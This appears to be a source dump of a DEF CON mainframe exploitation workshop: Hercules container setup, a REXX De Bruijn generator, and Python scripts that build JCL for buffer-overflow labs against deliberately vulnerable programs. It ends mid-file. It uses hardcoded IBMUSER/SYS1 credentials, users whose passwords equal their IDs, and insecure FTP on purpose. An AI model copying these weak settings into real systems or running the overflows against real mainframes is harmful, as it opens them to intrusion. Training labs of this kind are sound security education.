5 | 6 | # Does the hercules config file exist? 7 | # If not, copy the config from MVS/CE 8 | # and replace the folder location with 9 | # volume names 10 | if [ ! -f /config/local.cnf ]; then 11 | echo "[*] /config/local.cnf does not exist... 
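generating"
    sed 's_DASD/_/dasd/_g' MVSCE/conf/local.cnf > /config/local.cnf
    sed -i 's_punchcards/_/punchcards/_g' /config/local.cnf
    sed -i 's_printers/_/printers/_g' /config/local.cnf
    sed -i 's_mvslog.txt_/logs/mvslog.txt_g' /config/local.cnf
    # listeners must bind every interface to be reachable from outside the
    # container (one pass is enough; this substitution used to run twice)
    sed -i 's_localhost_0.0.0.0_g' /config/local.cnf
    sed -i 's_conf/local/_/config/local/_g' /config/local.cnf
    echo "" >> /config/local.cnf
    echo "#################################" >> /config/local.cnf
    echo "# Adding HTTP server for Docker" >> /config/local.cnf
    # single quotes keep ${HUSER:=hercules} ${HPASS:=hercules} literal in the
    # config file (presumably expanded by Hercules at load time); when neither
    # variable is set the HTTP console login falls back to hercules/hercules
    echo 'HTTP PORT 8888 AUTH ${HUSER:=hercules} ${HPASS:=hercules}' >> /config/local.cnf
    echo "HTTP START" >> /config/local.cnf
fi

if [ ! -f /config/local/custom.cnf ]; then
    echo "[*] /config/local/custom.cnf does not exist... generating"
    mkdir -p /config/local/
    sed 's_conf/local/_/config/local/_g' MVSCE/conf/local/custom.cnf > /config/local/custom.cnf
fi

# Sync the shipped per-component configs into /config/local, keeping a .bak
# of anything we overwrite and making sure custom.cnf INCLUDEs each file.
for conf in MVSCE/conf/local/*; do
    name="$(basename "$conf")"
    target="/config/local/$name"
    if cmp -s "$conf" "$target" ; then
        echo "[*] $target no changes"
    else
        # Check which file is newer
        if [ "$conf" -nt "$target" ]; then
            # backup the previous config if it exists
            cp "$target" "$target.bak" 2>/dev/null
            cp "$conf" "$target"
            sed 's_conf/local/_/config/local/_g' -i "$target"
            # check to make sure the config exists in custom.cnf.
            # grep's exit status is the test here; the previous form ran the
            # output of `grep -L` as a command, which never added the INCLUDE.
            if ! grep -qF -- "$target" /config/local/custom.cnf ; then
                # if not then we add it
                echo "INCLUDE $target" >> /config/local/custom.cnf
            fi
        fi
    fi
done



for disk in MVSCE/DASD/*; do
    if [ ! -f "/dasd/$(basename "$disk")" ]; then
        echo "[*] Copying $disk"
        cp -v "$disk" /dasd/
    fi
done

if [ ! -f /certs/ftp.pem ]; then
    echo "[*] /certs/ftp.pem does not exist... generating"
    # -nodes writes the private key unencrypted so socat can load the pem unattended;
    # the cert is self-signed, so clients must pin or skip verification
    openssl req -x509 -nodes -days 365 \
        -subj "/C=CA/ST=QC/O=FTPD Inc/CN=hercules.ftp" \
        -newkey rsa:2048 -keyout /certs/ftp.key \
        -out /certs/ftp.crt
    cat /certs/ftp.key /certs/ftp.crt > /certs/ftp.pem

fi

if [ ! -f /certs/ca.key ]; then
    echo "[*] /certs/ca.key (for web3270) does not exist... generating"
    # NOTE(review): with -x509 the file written to ca.csr is a self-signed
    # certificate, not a signing request, despite its name
    openssl req -x509 -nodes -days 365 \
        -subj "/C=CA/ST=QC/O=web3270 Inc/CN=3270.web" \
        -newkey rsa:2048 -keyout /certs/ca.key \
        -out /certs/ca.csr
fi

if [ ! -f /certs/3270.pem ]; then
    echo "[*] /certs/3270.pem does not exist... generating"
    openssl req -x509 -nodes -days 365 \
        -subj "/C=CA/ST=QC/O=TN3270 Inc/CN=hercules.3270" \
        -newkey rsa:2048 -keyout /certs/3270.key \
        -out /certs/3270.crt
    cat /certs/3270.key /certs/3270.crt > /certs/3270.pem

fi

# TLS termination only: verify=0 means no client certificate is requested,
# and the decrypted stream is forwarded to the plaintext listeners on loopback.
echo "[*] Starting encrypted FTP listener on port 3221"
( socat openssl-listen:3221,cert=/certs/ftp.pem,verify=0,reuseaddr,fork tcp4:127.0.0.1:2121 ) &
echo "[*] Starting encrypted TN3270 listener on port 3223"
( socat openssl-listen:3223,cert=/certs/3270.pem,verify=0,reuseaddr,fork tcp4:127.0.0.1:3270 ) &

echo "[*] Starting Wiki"
/usr/local/bin/start_tiddlywiki &

echo "[*] Launching web3270"
cd /web3270
python3 -u /web3270/server.py --config /config --certs /certs &
cd /MVSCE
echo "[*] Starting Hercules"
hercules -f /config/local.cnf -r conf/mvsce.rc --daemon > /logs/hercules.log
-------------------------------------------------------------------------------- /overflows/LGBT400: --------------------------------------------------------------------------------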
https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/overflows/LGBT400
-------------------------------------------------------------------------------- /overflows/LOC400: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/overflows/LOC400
-------------------------------------------------------------------------------- /overflows/WTO400: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/overflows/WTO400
-------------------------------------------------------------------------------- /rexx/DEBRUIJN.rex: --------------------------------------------------------------------------------
/* REXX */
/* Simplistic De Bruijn pattern generator in REXX                    */
/* SYNTAX: BRUJIN                                                    */
/* Author: davide girardi                                            */
/* https://github.com/davidegirardi                                  */
/* Emits the first LEN characters of the sequence Aa0 Aa1 ... Ab0 ...*/
/* (upper, lower, digit triplets), used to locate offsets in the     */
/* workshop overflow labs.                                           */
parse arg len
if len = '' then do
  say "Missing argument length usage: DEBRUIJN "
  exit
end
/* Alphabets the triplets are drawn from */
UPPERCASE = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWERCASE = "abcdefghijklmnopqrstuvwxyz"
ALLDIGITS = "1234567890"
say debruijn(len)
exit

/* debruijn: append one triplet per (upper, lower, digit) combination */
/* until the buffer holds at least LEN characters, then cut to LEN.   */
/* LEN is read from the caller's variable; the argument is not used.  */
debruijn:
  pattern = ""
  do uc = 1 to length(UPPERCASE)
    do lc = 1 to length(LOWERCASE)
      do dg = 1 to length(ALLDIGITS)
        /* once long enough, the remaining combinations are skipped */
        if length(pattern) >= len then iterate
        triplet = substr(UPPERCASE, uc, 1) || substr(LOWERCASE, lc, 1) || substr(ALLDIGITS, dg, 1)
        pattern = pattern || triplet
      end
    end
  end
  return substr(pattern, 1, len)
-------------------------------------------------------------------------------- /screenshot.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/screenshot.png
-------------------------------------------------------------------------------- /upload.py: --------------------------------------------------------------------------------
#!/usr/bin/env python3

## requires git clone https://github.com/jake-mainframe/ARBAUTH

# This will create DEFCON.* datasets
# Replaced the LOGON clist with motd.txt
# Adds users DC01 through DC30 to RAKF
#
# Generates jcl/upload.jcl by concatenating the JCL templates below; the
# script itself never talks to the mainframe, the generated job is submitted
# separately (see automation.py). Every JOB card carries the lab's default
# IBMUSER/SYS1 credentials in clear text, as does the generated file.

import sys
import math
from pathlib import Path

# Takes in a CLIST and splits the text on each line

if len(sys.argv) < 2:
    print("Missing argument\n Usage: {} motd.txt".format(sys.argv[0]))
    sys.exit()

# Job header plus the STDLOGON CLIST; {MOTD} receives the WRITE statements
# built from the motd text file given on the command line.
MOTDJCL = '''//UPLOAD JOB (JOB),'MOTD',
// CLASS=A,MSGLEVEL=(1,1),MSGCLASS=A,
// NOTIFY=IBMUSER,USER=IBMUSER,PASSWORD=SYS1
//*
//* This JCL was generated with upload.py use that dont edit this
//*
//MOTDPROC EXEC PGM=IEBUPDTE,PARM=NEW
//SYSPRINT DD SYSOUT=*
//SYSUT2 DD DSN=SYS1.CMDPROC,DISP=SHR
//SYSIN DD DATA,DLM='><'
./ ADD NAME=STDLOGON
PROC 0
CONTROL NOMSG,NOLIST,NOSYMLIST,NOCONLIST,NOFLUSH
CLS
{MOTD}
REVINIT
><
'''

# IEBGENER step for one DEFCON.OVERFLOW member; only used by
# upload_rdrprep_file(), whose callers are commented out below.
upload_file = '''//*
//* Adding DEFCON.OVERFLOW({member})
//*
//CRTEOVRF EXEC PGM=IEBGENER
//SYSUT2 DD DSN=DEFCON.OVERFLOW({member}),DISP=SHR
//SYSPRINT DD SYSOUT=*
//SYSIN DD DUMMY
//SYSUT1 DD DATA,DLM='{dlm}'
::E (unknown)
{dlm}
'''

# Three things in one template: the replacement ISPF CLIST, a new COMMND00
# (auto-starts JES2, FTPDDC30 and NET at IPL) and the FTPDPM00 parmlib
# member that configures the FTP daemon (port 2121, INSECURE=1 -- lab setting).
replace_ispf_clist = '''//*
//* Replace the ISPF clist to get rid of annoying "FREE" messages
//*
//ISPFPROC EXEC PGM=IEBUPDTE,PARM=NEW
//SYSPRINT DD SYSOUT=*
//SYSUT2 DD DSN=SYS1.CMDPROC,DISP=SHR
//SYSIN DD DATA,DLM='><'
./ ADD NAME=ISPF
PROC 0
/* ALLOCATE REQUIRED ISPF DD NAMES */
ALLOC F(ISPCLIB) DA('SYSGEN.ISPF.CLIB','SYSGEN.REVIEW.CLIST') SHR
ALLOC F(ISPLLIB) DA('SYSGEN.ISPF.LLIB','SYSGEN.REVIEW.LOAD') SHR
ALLOC F(ISPMLIB) DA('SYSGEN.ISPF.MLIB') SHR
ALLOC F(ISPPLIB) DA('SYSGEN.ISPF.PLIB','SYSGEN.ISPF.RFEPLIB') SHR
ALLOC F(ISPSLIB) DA('SYSGEN.ISPF.SLIB') SHR
ALLOC F(ISPTABL) DA('SYSGEN.ISPF.TLIB') SHR
ALLOC F(ISPTLIB) DA('SYSGEN.ISPF.TLIB') SHR
/* CREATE USERID.ISP.PROF IF IT DOES NOT EXIST */
IF &SYSDSN('&SYSUID..ISP.PROF') NE &STR(OK) THEN DO
/* CREATE THE DCB INFO */
ATTRIB PROFS BLKSIZE(3120) LRECL(80) DSORG(PO) RECFM(F,B)
/* ALLOCATE THE DATASET */
ALLOC DSNAME('&SYSUID..ISP.PROF') CYLINDERS SPACE(1,0) DIR(10) +
VOLUME(PUB001) UNIT(3390) USING(PROFS) NEW
/* FREE THE DCB INFO */
FREE ATTRLIST(PROFS)
END
/* ALLOCATE USER PROFILES */
ALLOC F(ISPPROF) DA('&SYSUID..ISP.PROF') SHR
ALLOC F(REVPROF) DA('&SYSUID..ISP.PROF') SHR
/* LAUNCH ISPF */
CALL 'SYSGEN.ISPF.LLIB(ISPF)'
FREE F(ISPCLIB,ISPLLIB,ISPMLIB,ISPPLIB,ISPSLIB,ISPTABL,ISPTLIB)
FREE F(ISPPROF,REVPROF)
><
//*
//* Replace COMMND00 with custom
//* Replace FTPD PARMLIB
//*
//NEWCOMND EXEC PGM=IEBUPDTE,PARM=NEW
//SYSUT2 DD DSN=SYS1.PARMLIB,DISP=OLD
//SYSPRINT DD SYSOUT=*
//SYSIN DD *
./ ADD NAME=COMMND00,LIST=ALL
./ NUMBER NEW1=10,INCR=10
COM='SEND 'AUTO COMMANDS IN COMMND00 BEING PROCESSED',CN=01'
COM='START JES2,,,PARM='WARM,NOREQ''
COM='START SETPFKEY,M=00'
COM='START FTPDDC30'
COM='START NET'
./ ADD NAME=FTPDPM00,LIST=ALL
SRVPORT=2121
SRVIP=ANY
PASVADR=127,0,0,1
PASVPORTS=31337-31347
INSECURE=1
AUTHUSER=IBMUSER
PUB000,3380 PUBLIC DATASETS (PRIVATE)
./ ENDUP
'''

# IEBUPDTE step loading {sources} (already in "./ ADD NAME=..." form) into DEFCON.SOURCE
sources = '''//*
//* Adds sources to DEFCON.source
//*
//SOURCES EXEC PGM=IEBUPDTE,REGION=1024K,PARM=NEW
//SYSPRINT DD SYSOUT=*
//SYSUT2 DD DSN=DEFCON.SOURCE,DISP=SHR
//SYSIN DD DATA,DLM=$$
{sources}
$$
'''

# Same shape as `sources`, targeting DEFCON.EXEC (one step per REXX script)
execs = '''//*
//* Adds REXX scripts to DEFCON.EXEC
//*
//REXXEXEC EXEC PGM=IEBUPDTE,REGION=1024K,PARM=NEW
//SYSPRINT DD SYSOUT=*
//SYSUT2 DD DSN=DEFCON.EXEC,DISP=SHR
//SYSIN DD DATA,DLM=$$
{execs}
$$
'''

# Same shape again, targeting the WHITE.RABBIT dataset; note the placeholder
# is named {sources} here, not {easteregg}
easteregg = '''//*
//* Adds Easter Eggs
//*
//EASTER EXEC PGM=IEBUPDTE,REGION=1024K,PARM=NEW
//SYSPRINT DD SYSOUT=*
//SYSUT2 DD DSN=WHITE.RABBIT,DISP=SHR
//SYSIN DD DATA,DLM=$$
{sources}
$$
'''

# extra member appended to DEFCON.SOURCE pointing players at WHITE.RABBIT
hint = "./ ADD NAME=EASTREGG,LIST=ALL\nDid you follow the WHITE.RABBIT?"

def upload_rdrprep_file(filename: str, member=False, dlm: str = "><") -> str:
    '''Uses rdrprep to upload a Binary file

    Returns the `upload_file` step for `filename`. When `member` is not given
    it is derived from the file name: text before the first ".", upper-cased,
    with any leading directory part stripped. Currently unused (see the
    comment block after `create_pds`).
    '''
    if not member:
        member = filename.split(".")[0].upper()
        if "/" in member:
            member = member.split("/")[-1]
    upload_file_jcl = upload_file.format(filename=filename,member=member,dlm=dlm)
    return upload_file_jcl

# Creates JCL to upload OVERFLOW files
jcl = ''

print("*** Generating MOTD")
motd = ''
with open(sys.argv[1],'r') as motd_text_file:
    for line in motd_text_file:
        l = len(line.rstrip())
        if l >= 80:
            # the line is too long, truncating
            l = 79
            line = line.rstrip()[:l]
        # each motd line becomes a CLIST WRITE split in two halves joined by a
        # trailing "-" (presumably the CLIST continuation character) so that no
        # generated card exceeds the 80-column limit
        first_half = line.rstrip()[:math.floor(l/2)]
        second_half = line.rstrip()[math.floor(l/2):]
        motd += "WRITE {first}-\n{second}\n".format(first=first_half,second=second_half)

jcl = MOTDJCL.format(MOTD=motd)

# IEFBR14 step allocating every DEFCON.* dataset (and WHITE.RABBIT) on PUB000
create_pds = '''//*
//* Create PDS to hold overflows
//*
//CREATEOF EXEC PGM=IEFBR14
//OVERFLOW DD DSN=DEFCON.OVERFLOW,DISP=(NEW,CATLG),
// UNIT=SYSDA,VOL=SER=PUB000,
// SPACE=(TRK,(3,3,3),RLSE),
// DCB=(DSORG=PS,RECFM=FB,LRECL=400,BLKSIZE=400)
//ARBAUTH DD DSN=DEFCON.OVERFLOW.ARBAUTH,DISP=(NEW,CATLG),
// UNIT=SYSDA,VOL=SER=PUB000,
// SPACE=(TRK,(3,3,3),RLSE),
// DCB=(DSORG=PS,RECFM=FB,LRECL=30000,BLKSIZE=30000)
//SOURCE DD DSN=DEFCON.SOURCE,DISP=(NEW,CATLG),
// UNIT=SYSDA,VOL=SER=PUB000,
// SPACE=(TRK,(3,3,3),RLSE),DCB=SYS1.MACLIB
//EXEC DD DSN=DEFCON.EXEC,DISP=(NEW,CATLG),
// UNIT=SYSDA,VOL=SER=PUB000,
// SPACE=(TRK,(3,3,3),RLSE),DCB=SYS2.EXEC
//WHTERABT DD DSN=WHITE.RABBIT,DISP=(NEW,CATLG),
// UNIT=SYSDA,VOL=SER=PUB000,
// SPACE=(TRK,(3,3,3),RLSE),DCB=SYS1.MACLIB
//FTPDDUMP DD DSN=DEFCON.FTPDDUMP,DISP=(NEW,CATLG),
// UNIT=SYSDA,VOL=SER=PUB000,
// SPACE=(TRK,(10,5),RLSE),
// DCB=(DSORG=PS,RECFM=FB,LRECL=121,BLKSIZE=400)
'''


# These dont work cause cards are max 80 cars, use FTP instead:
# for i in overflows/*; do lftp -e "cd DEFCON.OVERFLOW; put $i; bye" -u ibmuser,sys1 localhost:2121; done
# create_pds += upload_rdrprep_file("overflows/LGBT400")
# create_pds += upload_rdrprep_file("overflows/LOC400")
# create_pds += upload_rdrprep_file("overflows/WTO400")
# create_pds += upload_rdrprep_file("ARBAUTH/PATTERN")

print("*** Creating DEFCON.OVERFLOW and DEFCON.SOURCE")


jcl += create_pds

print("*** Adding Source files ")

# both source files are read relative to the current directory
with open("GETSPLOIT/hello.c", "r") as infile:
    hellosrc = "./ ADD NAME=HELLO,LIST=ALL\n{}".format( infile.read() )

with open("ARBAUTH/arbauth.jcl", "r") as infile:
    arbauthsrc = "./ ADD NAME=ARBAUTH,LIST=ALL\n{}".format( infile.read() )

jcl += sources.format(sources=hellosrc+arbauthsrc+hint)

with open("matrix.txt", "r") as infile:
    jcl += easteregg.format( sources = "./ ADD NAME=SCRIPT,LIST=ALL\n{}".format( infile.read() ) )

print("*** Adding REXX execs ")

p = Path("rexx/").glob('**/*')
files = [x for x in p if x.is_file()]

rx = ''
for rexx_script in sorted(files):
    with open(rexx_script,"r") as rexx:
        # member name = file stem up to the first ".", upper-cased
        rx += execs.format(
            execs="./ ADD NAME={},LIST=ALL\n".format(rexx_script.stem.split('.')[0].upper()) +
            rexx.read().rstrip()
        )

jcl += rx

# SORT merges the new USERS records into SYS1.SECURE.CNTL(USERS), then
# RAKFUSER rebuilds the RAKF database from it
add_rakf_profiles = '''//*
//* ADD RAKF PROFILES
//*
//ADDRAKFU EXEC PGM=SORT,REGION=512K,PARM='MSG=AP'
//STEPLIB DD DSN=SYSC.LINKLIB,DISP=SHR
//SYSOUT DD SYSOUT=A
//SYSPRINT DD SYSOUT=A
//SORTLIB DD DSNAME=SYSC.SORTLIB,DISP=SHR
//SORTOUT DD DSN=SYS1.SECURE.CNTL(USERS),DISP=SHR
//SORTWK01 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW1
//SORTWK02 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW2
//SORTWK03 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW3
//SORTWK04 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW5
//SORTWK05 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW6
//SYSIN DD *
SORT FIELDS=(1,80,CH,A)
RECORD TYPE=F,LENGTH=(80)
END
/*
//SORTIN DD DSN=SYS1.SECURE.CNTL(USERS),DISP=SHR
// DD DATA,DLM=@@
{users}
@@
//*
//* Update the RAKF database
//*
//RAKFUPDT EXEC RAKFUSER
'''

print("*** Adding DC00 - DC30 RAKF")

# NOTE(review): range(0,30) yields DC00..DC29, while the header comment says
# DC01-DC30 and the message above says DC00-DC30 -- confirm the intended set.
# The user id is repeated as the second value (presumably the initial
# password), which is the lab's deliberate weak-credential setup.
rakf_users = ''
for x in range(0,30):
    rakf_users += ("{usern} USERS {usern} N\n".format(usern="DC{}".format(str(x).zfill(2))))
jcl += add_rakf_profiles.format(users=rakf_users[:-1])  # [:-1] drops the final newline

jcl += replace_ispf_clist


print("*** Adding ARBAUTH/arbauth.jcl ")
with open("ARBAUTH/arbauth.jcl", "r") as infile:
    #ebcdic_jcl_to_upload += to_ebcdic(''.join(infile.readlines()[8:]))
    # the first 8 lines of arbauth.jcl are skipped (presumably its own JOB
    # card, since the text is appended to the job being built here)
    jcl += (''.join(infile.readlines()[8:]))


print("*** Writting jcl/upload.jcl")
with open("jcl/upload.jcl", "w") as outfile:
    outfile.write(jcl)


-------------------------------------------------------------------------------- /usersjcl.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # This script was built for the DEFCON Class 3 | # Use the JCL below to provision staging dataset 4 | # Then upload LGBT400, LOC400, WTO400 to IT. 5 | # The JCL generated expects to use rdrprep to generate EBCDIC 6 | # Once you've compiled and prelinked hello.c run this script 7 | # convert the output jcl to ebcdic jcl with rdrprep and submit 8 | # then one at a time to the EBCDIC reader on port 3506: 9 | # for i in *.jcl; do echo $i;rdrprep $i;cat reader.jcl|ncat --send-only -w1 172.17.0.3 3506; read; done 10 | 11 | ## JCL to build staging PDS for overflows. 12 | # //CREATEOF EXEC PGM=IEFBR14 13 | # //OVERFLOW DD DSN=DEFCON.OVERFLOW,DISP=(NEW,CATLG), 14 | # // UNIT=SYSDA,VOL=SER=PUB000, 15 | # // SPACE=(TRK,(3,3,3),RLSE), 16 | # // DCB=(DSORG=PS,RECFM=FB,LRECL=400,BLKSIZE=400) 17 | # //ARBAUTH DD DSN=DEFCON.OVERFLOW.ARBAUTH,DISP=(NEW,CATLG), 18 | # // UNIT=SYSDA,VOL=SER=PUB000, 19 | # // SPACE=(TRK,(3,3,3),RLSE), 20 | # // DCB=(DSORG=PS,RECFM=FB,LRECL=30000,BLKSIZE=30000) 21 | # //SOURCE DD DSN=DEFCON.SOURCE,DISP=(NEW,CATLG), 22 | # // UNIT=SYSDA,VOL=SER=PUB000, 23 | # // SPACE=(TRK,(3,3,3),RLSE),DCB=SYS1.MACLIB 24 | # //EXEC DD DSN=DEFCON.EXEC,DISP=(NEW,CATLG), 25 | # // UNIT=SYSDA,VOL=SER=PUB000, 26 | # // SPACE=(TRK,(3,3,3),RLSE),DCB=SYS2.EXEC 27 | 28 | 29 | from pathlib import Path 30 | 31 | 32 | # This job does all the magic 33 | USERJOB = ('''//{usern} JOB (1),'ADD {usern}',CLASS=S,MSGLEVEL=(1,1), 34 | // MSGCLASS=A,USER=IBMUSER,PASSWORD=SYS1,NOTIFY=IBMUSER 35 | // EXEC TSONUSER,ID={usern}, 36 | // PW='{usern}', 37 | // PR='IKJACCNT', 38 | // OP='NOOPER', 39 | // AC='NOACCT', 40 | // JC='JCL', 41 | // MT='NOMOUNT' 42 | //STEP01 EXEC PGM=IEFBR14 43 | //OVERFLOW DD DSN={usern}.OVERFLOW,DISP=(NEW,CATLG), 44 | // UNIT=SYSDA,VOL=SER=PUB000, 45 | // SPACE=(TRK,(3,3,3),RLSE), 46 | // DCB=DEFCON.OVERFLOW 47 | //ARBAUTH DD 
DSN={usern}.OVERFLOW.ARBAUTH,DISP=(NEW,CATLG), 48 | // UNIT=SYSDA,VOL=SER=PUB000, 49 | // SPACE=(TRK,(3,3,3),RLSE), 50 | // DCB=DEFCON.OVERFLOW.ARBAUTH 51 | //DUMP001 DD DSN={usern}.DUMP001,DISP=(NEW,CATLG), 52 | // UNIT=SYSDA,VOL=SER=PUB000, 53 | // SPACE=(TRK,(10,5),RLSE), 54 | // DCB=(DSORG=PS,RECFM=FB,LRECL=121,BLKSIZE=400) 55 | //DUMP002 DD DSN={usern}.DUMP002,DISP=(NEW,CATLG), 56 | // UNIT=SYSDA,VOL=SER=PUB000, 57 | // SPACE=(TRK,(10,5),RLSE), 58 | // DCB=(DSORG=PS,RECFM=FB,LRECL=121,BLKSIZE=400) 59 | //DUMP003 DD DSN={usern}.DUMP003,DISP=(NEW,CATLG), 60 | // UNIT=SYSDA,VOL=SER=PUB000, 61 | // SPACE=(TRK,(10,5),RLSE), 62 | // DCB=(DSORG=PS,RECFM=FB,LRECL=121,BLKSIZE=400) 63 | //DUMP004 DD DSN={usern}.DUMP004,DISP=(NEW,CATLG), 64 | // UNIT=SYSDA,VOL=SER=PUB000, 65 | // SPACE=(TRK,(10,5),RLSE), 66 | // DCB=(DSORG=PS,RECFM=FB,LRECL=121,BLKSIZE=400) 67 | //JCLLIB DD DSN={usern}.JCLLIB,DISP=(NEW,CATLG), 68 | // UNIT=SYSDA,VOL=SER=PUB000, 69 | // SPACE=(CYL,(1,1,20)),DCB=SYS1.MACLIB 70 | //* COPY ALL MEMBERS FROM ONE PDS TO ANOTHER 71 | //COPYTHEM EXEC PGM=IEBCOPY 72 | //SYSPRINT DD SYSOUT=* 73 | //* SYSUT1 is source SYSUT2 is destination 74 | //SYSUT1 DD DSN=DEFCON.OVERFLOW,DISP=SHR 75 | //SYSUT2 DD DSN={usern}.OVERFLOW,DISP=SHR 76 | //SYSIN DD DUMMY 77 | //* 78 | //* COPY ALL MEMBERS FROM ONE PDS TO ANOTHER 79 | //* 80 | //COPYOVRF EXEC PGM=IEBCOPY 81 | //SYSPRINT DD SYSOUT=* 82 | //* SYSUT1 is source SYSUT2 is destination 83 | //SYSUT1 DD DSN=DEFCON.OVERFLOW,DISP=SHR 84 | //SYSUT2 DD DSN={usern}.OVERFLOW,DISP=SHR 85 | //SYSIN DD DUMMY 86 | //* 87 | //* 88 | //* COPY ALL MEMBERS FROM ONE PDS TO ANOTHER 89 | //* 90 | //COPYOVRF EXEC PGM=IEBCOPY 91 | //SYSPRINT DD SYSOUT=* 92 | //* SYSUT1 is source SYSUT2 is destination 93 | //SYSUT1 DD DSN=DEFCON.OVERFLOW.ARBAUTH,DISP=SHR 94 | //SYSUT2 DD DSN={usern}.OVERFLOW.ARBAUTH,DISP=SHR 95 | //SYSIN DD DUMMY 96 | //* 97 | //COPYSRC EXEC PGM=IEBCOPY 98 | //SYSPRINT DD SYSOUT=* 99 | //* SYSUT1 is source SYSUT2 is destination 
100 | //SYSUT1 DD DSN=DEFCON.SOURCE,DISP=SHR 101 | //SYSUT2 DD DSN={usern}.SOURCE,DISP=SHR 102 | //SYSIN DD DUMMY 103 | //* 104 | //COPYEXEC EXEC PGM=IEBCOPY 105 | //SYSPRINT DD SYSOUT=* 106 | //* SYSUT1 is source SYSUT2 is destination 107 | //SYSUT1 DD DSN=DEFCON.EXEC,DISP=SHR 108 | //SYSUT2 DD DSN={usern}.EXEC,DISP=SHR 109 | //SYSIN DD DUMMY 110 | //* 111 | //LINK EXEC PGM=IEWL,PARM='MAP,LIST,XREF,NORENT',REGION=1024K 112 | //SYSPRINT DD SYSOUT=A 113 | //SYSLMOD DD DISP=SHR,DSN={usern}.LOAD(HELLO) 114 | //SYSUT1 DD UNIT=SYSDA,SPACE=(CYL,(5,1)) 115 | //SYSLIN DD DATA,DLM=$$ 116 | ::E GETSPLOIT/hello.load 117 | $$ 118 | //* 119 | //STORE EXEC PGM=IEBUPDTE,REGION=1024K,PARM=NEW 120 | //SYSPRINT DD SYSOUT=* 121 | //SYSUT2 DD DSN={usern}.JCLLIB,DISP=SHR 122 | //SYSIN DD DATA,DLM=$$ 123 | ./ ADD NAME=LAB01,LIST=ALL 124 | //{usern}LAB1 JOB (TSO), 125 | // 'Normal Run', 126 | // CLASS=A, 127 | // MSGCLASS=H, 128 | // MSGLEVEL=(1,1),NOTIFY=&SYSUID 129 | //RUN EXEC PGM=HELLO,REGION=0M 130 | //SYSPRINT DD SYSOUT=* 131 | //STDOUT DD SYSOUT=* 132 | //STDIN DD * 133 | TESTRUN 134 | //* 135 | //STEPLIB DD DISP=SHR,DSN={usern}.LOAD 136 | ./ ADD NAME=LAB02,LIST=ALL 137 | //{usern}LAB2 JOB (TSO), 138 | // 'Crash Run', 139 | // CLASS=A, 140 | // MSGCLASS=H, 141 | // MSGLEVEL=(1,1),NOTIFY=&SYSUID 142 | //RUN EXEC PGM=HELLO,REGION=0M 143 | //SYSPRINT DD SYSOUT=* 144 | //STDOUT DD SYSOUT=A 145 | //STDIN DD DISP=SHR,DSN={usern}.OVERFLOW(LGBT400) 146 | //STEPLIB DD DISP=SHR,DSN={usern}.LOAD 147 | //SYSUDUMP DD DISP=SHR,DSN={usern}.DUMP001 148 | ./ ADD NAME=LAB03,LIST=ALL 149 | //{usern}LAB3 JOB (TSO), 150 | // 'LOCATE Run', 151 | // CLASS=A, 152 | // MSGCLASS=H, 153 | // MSGLEVEL=(1,1),NOTIFY=&SYSUID 154 | //RUN EXEC PGM=HELLO,REGION=0M 155 | //SYSPRINT DD SYSOUT=* 156 | //STDOUT DD SYSOUT=A 157 | //STDIN DD DISP=SHR,DSN={usern}.OVERFLOW(LOC400) 158 | //STEPLIB DD DISP=SHR,DSN={usern}.LOAD 159 | //SYSUDUMP DD DISP=SHR,DSN={usern}.DUMP002 160 | ./ ADD NAME=LAB04,LIST=ALL 161 | 
//{usern}LAB4 JOB (TSO),'EXPLOIT Run',CLASS=A,MSGCLASS=H, 162 | // MSGLEVEL=(1,1),NOTIFY=&SYSUID 163 | //RUN EXEC PGM=HELLO,REGION=0M 164 | //SYSPRINT DD SYSOUT=* 165 | //STDOUT DD SYSOUT=* 166 | //STDIN DD DISP=SHR,DSN={usern}.OVERFLOW(WTO400) 167 | //STEPLIB DD DISP=SHR,DSN={usern}.LOAD 168 | //SYSUDUMP DD SYSOUT=* 169 | ./ ADD NAME=LAB05,LIST=ALL 170 | //{usern}LAB5 JOB (TSO), 171 | // 'RUN OPENTEST', 172 | // CLASS=A, 173 | // MSGCLASS=H, 174 | // MSGLEVEL=(2,1), 175 | // REGION=0K, 176 | // NOTIFY=&SYSUID 177 | //OPENTST EXEC PGM=OPENTST 178 | //SYSPRINT DD SYSOUT=A 179 | //STEPLIB DD DISP=SHR,DSN=SYSC.LINKLIB 180 | //SYSUDUMP DD DISP=SHR,DSN={usern}.DUMP003 181 | //INPUTDD DD * 182 | 183 | //* 184 | ./ ADD NAME=LAB06,LIST=ALL 185 | //{usern}LAB6 JOB (TSO), 186 | // 'DEBRUIJN PATTERN', 187 | // CLASS=A, 188 | // MSGCLASS=H, 189 | // MSGLEVEL=(2,1), 190 | // REGION=0K, 191 | // NOTIFY=&SYSUID 192 | //OPENTST EXEC PGM=IKJEFT01 193 | //SYSTSPRT DD SYSOUT=* 194 | //STDOUT DD DISP=SHR,DSN={usern}.OVERFLOW.ARBAUTH(DEBRUIJN) 195 | //SYSTSIN DD * 196 | RX '{usern}.EXEC(DEBRUIJN)' '1000' 197 | //* 198 | ./ ADD NAME=LAB07,LIST=ALL 199 | //{usern}LAB7 JOB (TSO), 200 | // 'HACK OPENTEST', 201 | // CLASS=A, 202 | // MSGCLASS=H, 203 | // MSGLEVEL=(2,1), 204 | // REGION=0K, 205 | // NOTIFY=&SYSUID 206 | //OPENTST EXEC PGM=OPENTST 207 | //SYSPRINT DD SYSOUT=* 208 | //STEPLIB DD DISP=SHR,DSN=SYSC.LINKLIB 209 | //SYSUDUMP DD DISP=SHR,DSN={usern}.DUMP003 210 | //INPUTDD DD DISP=SHR,DSN={usern}.OVERFLOW.ARBAUTH(DEBRUIJN) 211 | ./ ADD 